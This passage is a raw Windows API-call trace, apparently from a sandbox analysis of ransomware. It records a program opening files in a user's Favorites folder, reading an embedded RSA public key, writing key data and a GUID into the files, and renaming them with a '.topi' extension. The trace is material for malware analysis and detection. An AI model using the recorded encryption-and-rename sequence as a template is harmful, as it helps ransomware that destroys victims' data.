hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03498 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98e8 | out: hHeap=0x680000) returned 1 [0096.473] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0096.473] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0096.474] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a034b0 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03468 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d98d0 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a02900 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.474] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0096.475] WriteFile (in: hFile=0x6a8, lpBuffer=0x31b3ff8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x31b3ff8*, lpNumberOfBytesWritten=0x9ccfb14*=0x80, lpOverlapped=0x0) returned 1 [0096.475] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.475] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.475] WriteFile (in: hFile=0x6a8, lpBuffer=0x99def60*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99def60*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0096.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0096.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dd88 [0096.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0096.476] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0096.476] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0096.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dd88 | out: hHeap=0x680000) returned 1 [0096.476] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0096.476] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0096.476] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0096.476] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0096.476] CloseHandle (hObject=0x6a8) returned 1 [0096.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.477] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x890) returned 0x31cf750 [0096.477] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3ff8 | out: hHeap=0x680000) returned 1 [0096.478] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Money.url.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn money.url.topi")) returned 1 [0096.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0096.478] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.478] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.479] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3152ab8 | out: hHeap=0x680000) returned 1 [0096.479] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Sports.url", cAlternateFileName="MSNSPO~1.URL")) returned 1 [0096.480] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x99e3c40 [0096.480] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xa6) returned 0x3152ab8 [0096.480] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e3c40 | out: hHeap=0x680000) returned 1 [0096.480] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url") returned=".url" [0096.480] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0096.489] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=133) returned 1 [0096.489] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0096.493] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.493] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0096.494] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.494] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.494] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0096.494] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x85, lpOverlapped=0x0) returned 1 [0096.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.494] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0096.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.494] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0096.494] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0096.495] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0096.495] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0096.495] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0096.495] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0096.495] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0096.495] GetLastError () returned 0x0 [0096.495] CryptDestroyHash (hHash=0x31c7580) returned 1 [0096.495] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0096.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0096.496] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0096.496] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.496] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0096.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b3ff8 [0096.496] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0096.496] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02900 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98d0 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a02948 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d98e8 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0096.496] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0096.496] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x9a03438 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x9a03450 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0096.497] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03450 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6d4bd0 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0096.497] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0096.498] GetCurrentThreadId () returned 0x8c4 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f7f50 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.498] GetCurrentThreadId () returned 0x8c4 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0096.498] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0096.498] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x6d4bd0 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03438 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03450 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03468 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03480 [0096.499] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0096.499] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x9a03498 [0096.499] HeapFree (in: 